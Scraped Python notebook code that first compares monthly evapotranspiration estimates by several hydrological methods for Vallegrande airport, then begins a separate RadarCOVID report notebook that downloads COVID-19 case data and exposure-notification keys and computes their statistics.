df_RN['Tmax k4'] =(4.903*10**-9)*(273.16+df_calculos['TEMPERATURA MAXIMA (C)'])**4
df_RN['Tmin k4'] =(4.903*10**-9)*(273.16+df_calculos['TEMEPERATURA MINIMA (C)'])**4
df_RN['Rso'] =(0.75+2*elevacion/100000)*df_RN['RADIACION EXTRATERRESTRE (RA)']
df_RN['Rnl'] =((df_RN['Tmax k4']+df_RN['Tmin k4'])/2)*(1.35*df_RN['Rs']/df_RN['Rso']-0.35)*(0.34-0.14*(df_calculos['PRESION REAL DE VAPOR (KPA)'])**0.5)
df_RN['Rn'] = df_RN['Rns'] - df_RN['Rnl']
df_RN
#CALCULOS FINALES DE LA EVAPOTRANSPIRACION PROMEDIO DIARIA
df_calculos['RADIACION NETA EN LA SUPERFICIE (MJ/m2/DIA)'] = df_RN['Rn']
df_calculos['DIAS POR MES'] = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
df_calculos['EVAPOTRANSPIRACION PROMEDIO DIARIA'] = (0.408*df_calculos['PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)']*(df_calculos['RADIACION NETA EN LA SUPERFICIE (MJ/m2/DIA)'] -
df_calculos['FLUJO DEL CALOR DEL SUELO (mj/m2/dia)'])+(df_calculos['CONSTANTE PSICOMETRICA (Kpa/C)']*900/(df_calculos['TEMPERATURA MEDIA (C)']+273))*df_calculos['u2 (m/s)']*(df_calculos['PRESION VAPOR DE SATURACION (KPA)']-df_calculos['PRESION REAL DE VAPOR (KPA)']))/(df_calculos['PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)']+df_calculos['CONSTANTE PSICOMETRICA (Kpa/C)']*(1+0.34*df_calculos['u2 (m/s)']))
df_calculos['EVAPOTRANSPIRACION MENSUAL'] = df_calculos['EVAPOTRANSPIRACION PROMEDIO DIARIA'] * \
df_calculos['DIAS POR MES']
#TABLA FINAL DE RESULTADOS
df_calculos
# TABLA RESUMEN DE LA EVAPOTRANPIRACION
# creamos una nueva tabla donde se redondeara los resultados finales
# nombre columnas
evap_diaria = []
evap_mensual = []
for i in range(0, 12):
diaria = round(df_calculos['EVAPOTRANSPIRACION PROMEDIO DIARIA'][i], 3)
mensual = round(df_calculos['EVAPOTRANSPIRACION MENSUAL'][i], 3)
evap_diaria.append(diaria)
evap_mensual.append(mensual)
eto_mensual_fao =evap_mensual
nombre_tabla_RESUMEN = [
'MES', 'EVAPOTRANSPIRACION PROMEDIO DIARIA', 'EVAPOTRANSPIRACION PROMEDIO MENSUAL']
evapotranspiracion = list(zip(meses, evap_diaria, evap_mensual))
df_EVAP = pd.DataFrame(evapotranspiracion, columns=nombre_tabla_RESUMEN)
df_EVAP
#finalmente graficamos para ver el comportamiento de la evapotranspiracion en el transcurso del año
dias_acumulados = [31,59,90,120,151,181,212,243,273,304,334,365]
#Grafica
plt.plot( meses,evap_mensual, label="EVAPOTRANSPIRACION", ls='-')
#plt.axis(v)
plt.title(f'GRAFICA EVAPOTRANSPIRACION MENSUAL - VALLEGRANDE (AEROPUERTO)', color='#00008B')
plt.xlabel('Meses del año')
plt.ylabel(f'Evapotranspiracion mensual')
plt.grid(b=True, which='major', color='#666668', linestyle='--')
plt.legend(loc=4)
plt.show()
#METODO EVAPOTRANSPIRACION Makkink (Fontenot, 2004)
RS=df_RN['Rs']
PendSP = df_calculos['PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)']
cont_piezo = df_calculos['CONSTANTE PSICOMETRICA (Kpa/C)']
dias =df_calculos['DIAS POR MES']
#creamos una nueva tabla
#nombre columnas
nombre_tabla_EM = ['MES','RADIACION SOLAR (mm/dia)','PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)','CONSTANTE PSICOMETRICA (Kpa/C)','Dias por mes']
valores= list(zip(meses,RS,PendSP,cont_piezo,dias))
df_evap_Makkink=pd.DataFrame(valores,columns=nombre_tabla_EM)
#anadimos el ascendente
df_evap_Makkink
#calculamos la evapotranspiracion por el metodo de makkink
eto_makkink=0.61*(PendSP /(PendSP +cont_piezo))*(RS/2.45)-0.12
eto_mensual_makkind=dias*eto_makkink
df_evap_Makkink ['Eto Diaria'] = eto_makkink
df_evap_Makkink ['Evapotranspiracion Mensual'] = eto_mensual_makkind
df_evap_Makkink
#METODO de Jansen Haise
Tm = df_calculos ['TEMPERATURA MEDIA (C)']
#calculamos la evapotranspiracion
RS =RS*0.408 # conversion a mm/dia
eto_jansen=RS*(0.025*Tm+0.08)
eto_mensual_jansen =dias*eto_jansen
#creamos la tabla
#nombre columnas
nombre_tabla_EJ = ['MES','RADIACION SOLAR (mm/dia)','Temperatura Media (C)','Dias por mes','Evapotranspiracion diaria','Evapotranspiracion Mensual']
valores= list(zip(meses,RS,Tm,dias,eto_jansen,eto_mensual_jansen))
df_evap_jasen=pd.DataFrame(valores,columns=nombre_tabla_EJ)
#visualizamos la tabla
df_evap_jasen
# evapotranspiracion metodo Priestley - Taylor
Rn = df_RN['Rn']*0.408 #conversion a mm/dia
G = df_calculos['FLUJO DEL CALOR DEL SUELO (mj/m2/dia)']
# calculamos la evapotranspiracion
eto_priestley = 1.26*(PendSP/(PendSP+cont_piezo))*(Rn-G)
eto_mensual_priestley = dias*eto_priestley
# creamos la tabla
# nombre columnas
nombre_tabla_Ept = ['MES', 'RADIACION NETA (mm/dia)', 'PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)', 'CONSTANTE PSICOMETRICA (Kpa/C)',
'FLUJO DEL CALOR DEL SUELO (mm/dia)','Dias por mes', 'Evapotranspiracion diaria', 'Evapotranspiracion Mensual']
valores = list(zip(meses, Rn, PendSP , cont_piezo, G, dias, eto_priestley, eto_mensual_priestley))
df_evap_priestley = pd.DataFrame(valores, columns=nombre_tabla_Ept)
# visualizamos la tabla
df_evap_priestley
# metodo de Turc
Tm
RS = df_RN['Rs']
RS = RS/(4.1868*10**-2) # convertimos Rs a (cal/cm2/dia)
# calculamos la evpotranspiracion diaria
eto_turc = 0.0133*(Tm/(Tm+15))*(RS+50)
eto_mensual_turc = eto_turc*dias
# creamos la tabla
# nombre columnas
nombre_tabla_Epturc = ['MES', 'RADIACION SOLAR (Cal/cm2/dia)', 'Temperarura media (C)', 'Dias por mes',
'Evapotranspiracion diaria (mm/dia)', 'Evapotranspiracion Mensual']
valores = list(zip(meses, RS, Tm, dias, eto_turc, eto_mensual_turc))
df_evap_turc = pd.DataFrame(valores, columns=nombre_tabla_Epturc)
# visualizamos la tabla
df_evap_turc
# METODO DE HARGREAVES
# Radiacion solar extraterrestre
Ra = df_RN['RADIACION EXTRATERRESTRE (RA)']*0.408
Tmax = np.array(temperatura_maxima)
Tmin = np.array(temperatura_minima)
# calculamos la evapotranspiracion
eto_hargreaves = 0.0023*Ra*(Tm+17.8)*(Tmax-Tmin)**0.5
eto_mensual_hargreaves = eto_hargreaves*dias
# creamos la tabla
# nombre columnas
nombre_tabla_EpHargreaves = ['MES', 'RADIACION SOLAR EXTRATERRESTRE (mm/dia)', 'Temperarura media (C)', 'Temperatura maxima (C)', 'Temperatura minima (C)', 'Dias por mes',
'Evapotranspiracion diaria', 'Evapotranspiracion Mensual']
valores = list(zip(meses, Ra, Tm, Tmax, Tmin, dias,
eto_hargreaves, eto_mensual_hargreaves))
df_evap_Hargreaves = pd.DataFrame(valores, columns=nombre_tabla_EpHargreaves)
# visualizamos la tabla
df_evap_Hargreaves
# Metodo de Thornthwaite
# empezamos calculando sus variables
Indice_termico_mensual = (Tm/5)**1.514
Indice_termico_anual = Indice_termico_mensual.sum()
a = ((675*10**(-9))*Indice_termico_anual**3-(771*10**(-7)) *
Indice_termico_anual**2+(1792*10**(-5)*Indice_termico_anual)+0.49239)
#los valores constantes los convertimos a lista
I_mensual_lista=[Indice_termico_anual for x in range(1, 13)]
a_lista=[a for x in range(1, 13)]
# Calculamos la evapotranspiracion teorica
eto_Thornthwaite_teorica = 16*(10*Tm/Indice_termico_anual)**a
# insolacion maxima (N)
N = col_insolacion
f = N/12
d_30 = dias/30
# finalmente el valor teorico
eto_mensual_Thornthwaite = d_30*f*eto_Thornthwaite_teorica
# creamos la tabla
# nombre columnas
nombre_tabla_Thornthwaite = ['MES', 'Temperarura media (C)', 'Indice Termico Mensual', 'Indice Termico Anual', 'a', 'Evapotranspiracion Teorica Diaria',
'Insolacion maxima diaria', 'f', 'Dias por mes', 'Evapotranspiracion Mensual']
valores = list(zip(meses, Tm, Indice_termico_mensual, I_mensual_lista, a_lista, eto_Thornthwaite_teorica,
N, f, dias, eto_mensual_Thornthwaite))
df_evap_Thornthwaite = pd.DataFrame(valores, columns=nombre_tabla_Thornthwaite)
# visualizamos la tabla
df_evap_Thornthwaite
# Comparamos los resultados en una tabla resumen
# las listas de los valores por cada metodo
"""
eto_mensual_fao
eto_mensual_makkind
eto_mensual_jansen
eto_mensual_priestley
eto_mensual_turc
eto_mensual_hargreaves
eto_mensual_Thornthwaite """
# creamos la tabla resumen
# nombre columnas
nombre_tabla_resumen_metodos = ['MES', 'Metodo de la FAO', 'Metodo Makkind', 'Metodo Jansen', 'Metodo Priestley', 'Metodo Turc', 'Metodo Hardgreaves',
'Metodo Thornthwaite', ]
valores = list(zip(meses, eto_mensual_fao, eto_mensual_makkind, eto_mensual_jansen, eto_mensual_priestley, eto_mensual_turc,
eto_mensual_hargreaves, eto_mensual_Thornthwaite))
df_resumen_metodos = pd.DataFrame(valores, columns=nombre_tabla_resumen_metodos)
# visualizamos la tabla
df_resumen_metodos
#graficamos los valores por cada metodo para ver el comportamiento de la evapotranspiracion en el transcurso del año
dias_acumulados = [31,59,90,120,151,181,212,243,273,304,334,365]
#Grafica
fig = plt.figure(figsize=(15,7 ))
plt.plot( meses,eto_mensual_fao, label="FAO", ls='-',)
plt.plot( meses,eto_mensual_makkind, label="MAKKIND", ls='-')
plt.plot( meses,eto_mensual_jansen, label="JANSEN", ls='-')
plt.plot( meses,eto_mensual_priestley, label="PRIESTLEY", ls='-')
plt.plot( meses,eto_mensual_turc, label="TURC", ls='-')
plt.plot( meses,eto_mensual_hargreaves, label="HARGREAVES", ls='-')
plt.plot( meses,eto_mensual_Thornthwaite, label="THORNTHAWAITE", ls='-')
#plt.axis(v)
plt.title(f'EVAPOTRANSPIRACION MENSUAL POR CADA METODO ', color='#00008B',fontsize=18)
plt.xlabel('Meses del año',fontsize=14)
plt.ylabel(f'Evapotranspiracion mensual',fontsize=14)
plt.grid(b=True, which='major', color='#666668', linestyle='--')
plt.legend(loc=4)
plt.show()
#Creamos la Matriz de correlacion con la libreria seaborn
#esto nos permite saber que tan dispersos se encuentran la correlacion de los resultados entre los diferentes metodos
import seaborn as sns
corr_df = df_resumen_metodos.corr(method='pearson')
plt.figure(figsize=(8, 6))
sns.heatmap(corr_df, annot=True)
plt.show()
```
| github_jupyter |
# RadarCOVID-Report
## Data Extraction
```
import datetime
import json
import logging
import os
import shutil
import tempfile
import textwrap
import uuid
import matplotlib.pyplot as plt
import matplotlib.ticker
import numpy as np
import pandas as pd
import pycountry
import retry
import seaborn as sns
%matplotlib inline
current_working_directory = os.environ.get("PWD")
if current_working_directory:
os.chdir(current_working_directory)
sns.set()
matplotlib.rcParams["figure.figsize"] = (15, 6)
extraction_datetime = datetime.datetime.utcnow()
extraction_date = extraction_datetime.strftime("%Y-%m-%d")
extraction_previous_datetime = extraction_datetime - datetime.timedelta(days=1)
extraction_previous_date = extraction_previous_datetime.strftime("%Y-%m-%d")
extraction_date_with_hour = datetime.datetime.utcnow().strftime("%Y-%m-%d@%H")
current_hour = datetime.datetime.utcnow().hour
are_today_results_partial = current_hour != 23
```
### Constants
```
from Modules.ExposureNotification import exposure_notification_io
# Region/country codes used throughout the report.
spain_region_country_code = "ES"
germany_region_country_code = "DE"
default_backend_identifier = spain_region_country_code
# Window sizes (in days) for backend downloads, summary tables and plots.
backend_generation_days = 7 * 2
daily_summary_days = 7 * 4 * 3
daily_plot_days = 7 * 4
tek_dumps_load_limit = daily_summary_days + 1
```
### Parameters
```
# --- Report parameters, overridable through environment variables. ---

# Backend to report on; an unset/empty variable falls back to the default.
environment_backend_identifier = os.environ.get("RADARCOVID_REPORT__BACKEND_IDENTIFIER")
report_backend_identifier = environment_backend_identifier or default_backend_identifier
report_backend_identifier

# Multi-backend download: None means "download from all backends", otherwise
# restrict to the report backend only.
environment_enable_multi_backend_download = \
    os.environ.get("RADARCOVID_REPORT__ENABLE_MULTI_BACKEND_DOWNLOAD")
report_backend_identifiers = \
    None if environment_enable_multi_backend_download else [report_backend_identifier]
report_backend_identifiers

# Comma-separated dates whose shared-diagnoses figures must be zeroed out.
environment_invalid_shared_diagnoses_dates = \
    os.environ.get("RADARCOVID_REPORT__INVALID_SHARED_DIAGNOSES_DATES")
invalid_shared_diagnoses_dates = \
    environment_invalid_shared_diagnoses_dates.split(",") \
    if environment_invalid_shared_diagnoses_dates else []
invalid_shared_diagnoses_dates
```
### COVID-19 Cases
```
# Client for the exposure-notification backend this report covers.
report_backend_client = \
    exposure_notification_io.get_backend_client_with_identifier(
        backend_identifier=report_backend_identifier)
# Retried download: the remote endpoint is occasionally unavailable.
@retry.retry(tries=10, delay=10, backoff=1.1, jitter=(0, 10))
def download_cases_dataframe():
    """Download the Our World in Data COVID-19 dataset as a DataFrame."""
    return pd.read_csv("https://raw.githubusercontent.com/owid/covid-19-data/master/public/data/owid-covid-data.csv")
confirmed_df_ = download_cases_dataframe()
confirmed_df_.iloc[0]
# Keep only the columns the report needs and normalize their names.
confirmed_df = confirmed_df_.copy()
confirmed_df = confirmed_df[["date", "new_cases", "iso_code"]]
confirmed_df.rename(
    columns={
        "date": "sample_date",
        "iso_code": "country_code",
    },
    inplace=True)
def convert_iso_alpha_3_to_alpha_2(x):
    """Map an ISO 3166-1 alpha-3 country code to its alpha-2 form.

    Returns None (and logs at INFO level) when the lookup fails for any reason,
    so bad rows can be dropped downstream instead of aborting the report.
    """
    try:
        country = pycountry.countries.get(alpha_3=x)
        return country.alpha_2
    except Exception as e:
        logging.info(f"Error converting country ISO Alpha 3 code '{x}': {repr(e)}")
        return None
# Normalize country codes to ISO alpha-2 and dates to "YYYY-MM-DD" strings.
confirmed_df["country_code"] = confirmed_df.country_code.apply(convert_iso_alpha_3_to_alpha_2)
confirmed_df.dropna(inplace=True)
confirmed_df["sample_date"] = pd.to_datetime(confirmed_df.sample_date, dayfirst=True)
confirmed_df["sample_date"] = confirmed_df.sample_date.dt.strftime("%Y-%m-%d")
confirmed_df.sort_values("sample_date", inplace=True)
confirmed_df.tail()
# Calendar of every day from the first confirmed sample up to extraction time,
# used later to join case data so days without reports still appear.
confirmed_days = pd.date_range(
    start=confirmed_df.iloc[0].sample_date,
    end=extraction_datetime)
confirmed_days_df = pd.DataFrame(data=confirmed_days, columns=["sample_date"])
confirmed_days_df["sample_date_string"] = \
    confirmed_days_df.sample_date.dt.strftime("%Y-%m-%d")
confirmed_days_df.tail()
def sort_source_regions_for_display(source_regions: list, priority_region=None) -> list:
    """Return the source regions sorted alphabetically, with one region pinned first.

    Parameters:
        source_regions: region codes to sort (not mutated).
        priority_region: region to pin to the front when present; when None
            (the default, preserving the original behavior) the module-level
            ``report_backend_identifier`` is used.

    Note: when the priority region is present, duplicates are removed via the
    set difference; otherwise the list is sorted as-is (original behavior kept).
    """
    if priority_region is None:
        priority_region = report_backend_identifier
    if priority_region in source_regions:
        return [priority_region] + \
            list(sorted(set(source_regions).difference([priority_region])))
    return list(sorted(source_regions))
# Source regions contributing TEKs to the report backend at extraction time.
report_source_regions = report_backend_client.source_regions_for_date(
    date=extraction_datetime.date())
report_source_regions = sort_source_regions_for_display(
    source_regions=report_source_regions)
report_source_regions
def get_cases_dataframe(source_regions_for_date_function, columns_suffix=None):
    """Build a daily COVID-19 case series aggregated over each date's source regions.

    Parameters:
        source_regions_for_date_function: callable taking ``date=`` and returning
            the list of region codes contributing on that date.
        columns_suffix: when given, appended to the output case column names,
            e.g. "es" -> "new_cases_es" / "covid_cases_es".

    Returns:
        Tuple of (cases DataFrame with one row per calendar day, DataFrame
        mapping each sample_date to its comma-joined source-regions group).
    """
    # Resolve the applicable source regions for every calendar day.
    source_regions_at_date_df = confirmed_days_df.copy()
    source_regions_at_date_df["source_regions_at_date"] = \
        source_regions_at_date_df.sample_date.apply(
            lambda x: source_regions_for_date_function(date=x))
    source_regions_at_date_df.sort_values("sample_date", inplace=True)
    # Canonical comma-joined key so days sharing the same region set group together.
    source_regions_at_date_df["_source_regions_group"] = source_regions_at_date_df. \
        source_regions_at_date.apply(lambda x: ",".join(sort_source_regions_for_display(x)))
    source_regions_at_date_df.tail()
    #%%
    source_regions_for_summary_df_ = \
        source_regions_at_date_df[["sample_date", "_source_regions_group"]].copy()
    source_regions_for_summary_df_.rename(columns={"_source_regions_group": "source_regions"}, inplace=True)
    source_regions_for_summary_df_.tail()
    #%%
    confirmed_output_columns = ["sample_date", "new_cases", "covid_cases"]
    confirmed_output_df = pd.DataFrame(columns=confirmed_output_columns)
    # For each region group: sum daily new cases over its countries, then
    # smooth with a 7-day rolling mean ("covid_cases").
    for source_regions_group, source_regions_group_series in \
            source_regions_at_date_df.groupby("_source_regions_group"):
        source_regions_set = set(source_regions_group.split(","))
        confirmed_source_regions_set_df = \
            confirmed_df[confirmed_df.country_code.isin(source_regions_set)].copy()
        confirmed_source_regions_group_df = \
            confirmed_source_regions_set_df.groupby("sample_date").new_cases.sum() \
            .reset_index().sort_values("sample_date")
        # Right-join against the full calendar so missing days appear as NaN.
        confirmed_source_regions_group_df = \
            confirmed_source_regions_group_df.merge(
                confirmed_days_df[["sample_date_string"]].rename(
                    columns={"sample_date_string": "sample_date"}),
                how="right")
        # Negative corrections published upstream are clipped to zero.
        confirmed_source_regions_group_df["new_cases"] = \
            confirmed_source_regions_group_df["new_cases"].clip(lower=0)
        confirmed_source_regions_group_df["covid_cases"] = \
            confirmed_source_regions_group_df.new_cases.rolling(7, min_periods=0).mean().round()
        confirmed_source_regions_group_df = \
            confirmed_source_regions_group_df[confirmed_output_columns]
        # Zeros become NaN so the forward-fill carries the last real value.
        confirmed_source_regions_group_df = confirmed_source_regions_group_df.replace(0, np.nan)
        confirmed_source_regions_group_df.fillna(method="ffill", inplace=True)
        # Keep only the days on which this exact region group was active.
        confirmed_source_regions_group_df = \
            confirmed_source_regions_group_df[
                confirmed_source_regions_group_df.sample_date.isin(
                    source_regions_group_series.sample_date_string)]
        # NOTE(review): DataFrame.append was removed in pandas 2.0; pd.concat
        # is the forward-compatible replacement.
        confirmed_output_df = confirmed_output_df.append(confirmed_source_regions_group_df)
    result_df = confirmed_output_df.copy()
    result_df.tail()
    #%%
    # Re-align onto the full calendar and forward-fill remaining gaps.
    result_df.rename(columns={"sample_date": "sample_date_string"}, inplace=True)
    result_df = confirmed_days_df[["sample_date_string"]].merge(result_df, how="left")
    result_df.sort_values("sample_date_string", inplace=True)
    result_df.fillna(method="ffill", inplace=True)
    result_df.tail()
    #%%
    result_df[["new_cases", "covid_cases"]].plot()
    if columns_suffix:
        result_df.rename(
            columns={
                "new_cases": "new_cases_" + columns_suffix,
                "covid_cases": "covid_cases_" + columns_suffix},
            inplace=True)
    return result_df, source_regions_for_summary_df_
# EU-wide series (source regions vary by date) and a Spain-only series.
confirmed_eu_df, source_regions_for_summary_df = get_cases_dataframe(
    report_backend_client.source_regions_for_date)
confirmed_es_df, _ = get_cases_dataframe(
    lambda date: [spain_region_country_code],
    columns_suffix=spain_region_country_code.lower())
```
### Extract API TEKs
```
# Download TEKs (Temporary Exposure Keys) from the configured backends,
# archiving the raw zips.
raw_zip_path_prefix = "Data/TEKs/Raw/"
base_backend_identifiers = [report_backend_identifier]
multi_backend_exposure_keys_df = \
    exposure_notification_io.download_exposure_keys_from_backends(
        backend_identifiers=report_backend_identifiers,
        generation_days=backend_generation_days,
        fail_on_error_backend_identifiers=base_backend_identifiers,
        save_raw_zip_path_prefix=raw_zip_path_prefix)
multi_backend_exposure_keys_df["region"] = multi_backend_exposure_keys_df["backend_identifier"]
multi_backend_exposure_keys_df.rename(
    columns={
        "generation_datetime": "sample_datetime",
        "generation_date_string": "sample_date_string",
    },
    inplace=True)
multi_backend_exposure_keys_df.head()
# TEKs valid for less than a full day (rolling_period < 144, i.e. 10-minute
# units): histogram their validity in hours, previous days vs. today.
early_teks_df = multi_backend_exposure_keys_df[
    multi_backend_exposure_keys_df.rolling_period < 144].copy()
early_teks_df["rolling_period_in_hours"] = early_teks_df.rolling_period / 6
early_teks_df[early_teks_df.sample_date_string != extraction_date] \
    .rolling_period_in_hours.hist(bins=list(range(24)))
early_teks_df[early_teks_df.sample_date_string == extraction_date] \
    .rolling_period_in_hours.hist(bins=list(range(24)))
multi_backend_exposure_keys_df = multi_backend_exposure_keys_df[[
    "sample_date_string", "region", "key_data"]]
multi_backend_exposure_keys_df.head()
# Regions that actually served keys, ordered by number of distinct TEKs.
active_regions = \
    multi_backend_exposure_keys_df.groupby("region").key_data.nunique().sort_values().index.unique().tolist()
active_regions
# Distinct TEKs per day per region (newest day first), one column per region.
multi_backend_summary_df = multi_backend_exposure_keys_df.groupby(
    ["sample_date_string", "region"]).key_data.nunique().reset_index() \
    .pivot(index="sample_date_string", columns="region") \
    .sort_index(ascending=False)
multi_backend_summary_df.rename(
    columns={"key_data": "shared_teks_by_generation_date"},
    inplace=True)
multi_backend_summary_df.rename_axis("sample_date", inplace=True)
multi_backend_summary_df = multi_backend_summary_df.fillna(0).astype(int)
multi_backend_summary_df = multi_backend_summary_df.head(backend_generation_days)
multi_backend_summary_df.head()
def compute_keys_cross_sharing(x):
    """For one (region_x, region_y) pair, compute the TEKs present in both
    backends and the fraction of backend A's TEKs also found in backend B.

    *x* is a single-row group holding the two backends' unique key arrays.
    """
    teks_a = x.key_data_x.item()
    teks_b = x.key_data_y.item()
    shared = set(teks_a) & set(teks_b)
    return pd.Series({
        "common_teks": shared,
        "common_teks_fraction": len(shared) / len(teks_a),
    })
# Cross-join regions to measure TEK sharing between every backend pair.
multi_backend_exposure_keys_by_region_df = \
    multi_backend_exposure_keys_df.groupby("region").key_data.unique().reset_index()
multi_backend_exposure_keys_by_region_df["_merge"] = True
multi_backend_exposure_keys_by_region_combination_df = \
    multi_backend_exposure_keys_by_region_df.merge(
        multi_backend_exposure_keys_by_region_df, on="_merge")
multi_backend_exposure_keys_by_region_combination_df.drop(
    columns=["_merge"], inplace=True)
# Drop self-pairs, unless there is a single region (keeps the table non-empty).
if multi_backend_exposure_keys_by_region_combination_df.region_x.nunique() > 1:
    multi_backend_exposure_keys_by_region_combination_df = \
        multi_backend_exposure_keys_by_region_combination_df[
            multi_backend_exposure_keys_by_region_combination_df.region_x !=
            multi_backend_exposure_keys_by_region_combination_df.region_y]
multi_backend_exposure_keys_cross_sharing_df = \
    multi_backend_exposure_keys_by_region_combination_df \
        .groupby(["region_x", "region_y"]) \
        .apply(compute_keys_cross_sharing) \
        .reset_index()
# Pivot into a region-by-region matrix of sharing fractions.
multi_backend_cross_sharing_summary_df = \
    multi_backend_exposure_keys_cross_sharing_df.pivot_table(
        values=["common_teks_fraction"],
        columns="region_x",
        index="region_y",
        aggfunc=lambda x: x.item())
multi_backend_cross_sharing_summary_df
# Backends other than the one this report covers.
multi_backend_without_active_region_exposure_keys_df = \
    multi_backend_exposure_keys_df[multi_backend_exposure_keys_df.region != report_backend_identifier]
multi_backend_without_active_region = \
    multi_backend_without_active_region_exposure_keys_df.groupby("region").key_data.nunique().sort_values().index.unique().tolist()
multi_backend_without_active_region
# Distinct TEKs per generation date for the report backend only.
exposure_keys_summary_df = multi_backend_exposure_keys_df[
    multi_backend_exposure_keys_df.region == report_backend_identifier]
exposure_keys_summary_df.drop(columns=["region"], inplace=True)
exposure_keys_summary_df = \
    exposure_keys_summary_df.groupby(["sample_date_string"]).key_data.nunique().to_frame()
exposure_keys_summary_df = \
    exposure_keys_summary_df.reset_index().set_index("sample_date_string")
exposure_keys_summary_df.sort_index(ascending=False, inplace=True)
exposure_keys_summary_df.rename(columns={"key_data": "shared_teks_by_generation_date"}, inplace=True)
exposure_keys_summary_df.head()
```
### Dump API TEKs
```
# Dump the extracted TEK lists to JSON: a "Current" snapshot plus daily and
# hourly history files.
tek_list_df = multi_backend_exposure_keys_df[
    ["sample_date_string", "region", "key_data"]].copy()
tek_list_df["key_data"] = tek_list_df["key_data"].apply(str)
tek_list_df.rename(columns={
    "sample_date_string": "sample_date",
    "key_data": "tek_list"}, inplace=True)
tek_list_df = tek_list_df.groupby(
    ["sample_date", "region"]).tek_list.unique().reset_index()
tek_list_df["extraction_date"] = extraction_date
tek_list_df["extraction_date_with_hour"] = extraction_date_with_hour
tek_list_path_prefix = "Data/TEKs/"
tek_list_current_path = tek_list_path_prefix + f"/Current/RadarCOVID-TEKs.json"
tek_list_daily_path = tek_list_path_prefix + f"Daily/RadarCOVID-TEKs-{extraction_date}.json"
tek_list_hourly_path = tek_list_path_prefix + f"Hourly/RadarCOVID-TEKs-{extraction_date_with_hour}.json"
for path in [tek_list_current_path, tek_list_daily_path, tek_list_hourly_path]:
    os.makedirs(os.path.dirname(path), exist_ok=True)
tek_list_base_df = tek_list_df[tek_list_df.region == report_backend_identifier]
# Each dump keeps only the columns meaningful at its granularity.
tek_list_base_df.drop(columns=["extraction_date", "extraction_date_with_hour"]).to_json(
    tek_list_current_path,
    lines=True, orient="records")
tek_list_base_df.drop(columns=["extraction_date_with_hour"]).to_json(
    tek_list_daily_path,
    lines=True, orient="records")
tek_list_base_df.to_json(
    tek_list_hourly_path,
    lines=True, orient="records")
tek_list_base_df.head()
```
### Load TEK Dumps
```
import glob
def load_extracted_teks(mode, region=None, limit=None) -> pd.DataFrame:
    """Load previously dumped TEK JSON files into one DataFrame.

    Parameters:
        mode: dump folder to read, e.g. "Daily" or "Hourly".
        region: when given, keep only rows for this backend region.
        limit: when given, load at most this many of the most recent files.

    Returns:
        DataFrame with at least a "region" column; rows with a missing region
        value are attributed to Spain.
    """
    # Newest dumps first (file names embed the extraction date).
    file_paths = list(reversed(sorted(glob.glob(
        tek_list_path_prefix + mode + "/RadarCOVID-TEKs-*.json"))))
    if limit:
        file_paths = file_paths[:limit]
    # Seed with an empty frame so the "region" column exists even with no files.
    loaded_dfs = [pd.DataFrame(columns=["region"])]
    for file_path in file_paths:
        logging.info(f"Loading TEKs from '{file_path}'...")
        loaded_dfs.append(pd.read_json(file_path, lines=True))
    # DataFrame.append was removed in pandas 2.0; a single concat is also
    # linear instead of quadratic in the number of files.
    extracted_teks_df = pd.concat(loaded_dfs, sort=False)
    extracted_teks_df["region"] = \
        extracted_teks_df.region.fillna(spain_region_country_code).copy()
    if region:
        extracted_teks_df = \
            extracted_teks_df[extracted_teks_df.region == region]
    return extracted_teks_df
# Load the daily dumps for the report backend (most recent first).
daily_extracted_teks_df = load_extracted_teks(
    mode="Daily",
    region=report_backend_identifier,
    limit=tek_dumps_load_limit)
daily_extracted_teks_df.head()
# Rebuild the per-generation-date TEK counts from the dumps: for each sample
# date take the TEK list from the newest extraction, then count its entries.
exposure_keys_summary_df_ = daily_extracted_teks_df \
    .sort_values("extraction_date", ascending=False) \
    .groupby("sample_date").tek_list.first() \
    .to_frame()
exposure_keys_summary_df_.index.name = "sample_date_string"
exposure_keys_summary_df_["tek_list"] = \
    exposure_keys_summary_df_.tek_list.apply(len)
exposure_keys_summary_df_ = exposure_keys_summary_df_ \
    .rename(columns={"tek_list": "shared_teks_by_generation_date"}) \
    .sort_index(ascending=False)
# Replaces the API-derived summary computed earlier.
exposure_keys_summary_df = exposure_keys_summary_df_
exposure_keys_summary_df.head()
```
### Daily New TEKs
```
# For each extraction date, the full set of TEKs seen across all its dumps.
tek_list_df = daily_extracted_teks_df.groupby("extraction_date").tek_list.apply(
    lambda x: set(sum(x, []))).reset_index()
tek_list_df = tek_list_df.set_index("extraction_date").sort_index(ascending=True)
tek_list_df.head()
def compute_teks_by_generation_and_upload_date(date):
    """For one upload (extraction) date, count newly shared TEKs broken down
    by their generation date.

    Returns a DataFrame with columns upload_date, generation_date, shared_teks
    and generation_to_upload_days, keeping only rows with shared TEKs.
    """
    # TEKs first seen on each extraction date (set difference vs. previous day).
    day_new_teks_set_df = tek_list_df.copy().diff()
    try:
        day_new_teks_set = day_new_teks_set_df[
            day_new_teks_set_df.index == date].tek_list.item()
    except ValueError:
        # No single row for this date: treat as no new TEKs.
        day_new_teks_set = None
    if pd.isna(day_new_teks_set):
        day_new_teks_set = set()
    day_new_teks_df = daily_extracted_teks_df[
        daily_extracted_teks_df.extraction_date == date].copy()
    # Per generation date: how many of its TEKs are among the newly shared ones.
    day_new_teks_df["shared_teks"] = \
        day_new_teks_df.tek_list.apply(lambda x: set(x).intersection(day_new_teks_set))
    day_new_teks_df["shared_teks"] = \
        day_new_teks_df.shared_teks.apply(len)
    day_new_teks_df["upload_date"] = date
    day_new_teks_df.rename(columns={"sample_date": "generation_date"}, inplace=True)
    day_new_teks_df = day_new_teks_df[
        ["upload_date", "generation_date", "shared_teks"]]
    day_new_teks_df["generation_to_upload_days"] = \
        (pd.to_datetime(day_new_teks_df.upload_date) -
         pd.to_datetime(day_new_teks_df.generation_date)).dt.days
    day_new_teks_df = day_new_teks_df[day_new_teks_df.shared_teks > 0]
    return day_new_teks_df
# Accumulate the generation-to-upload breakdown over every known upload date.
shared_teks_generation_to_upload_df = pd.DataFrame()
for upload_date in daily_extracted_teks_df.extraction_date.unique():
    shared_teks_generation_to_upload_df = \
        shared_teks_generation_to_upload_df.append(
            compute_teks_by_generation_and_upload_date(date=upload_date))
shared_teks_generation_to_upload_df \
    .sort_values(["upload_date", "generation_date"], ascending=False, inplace=True)
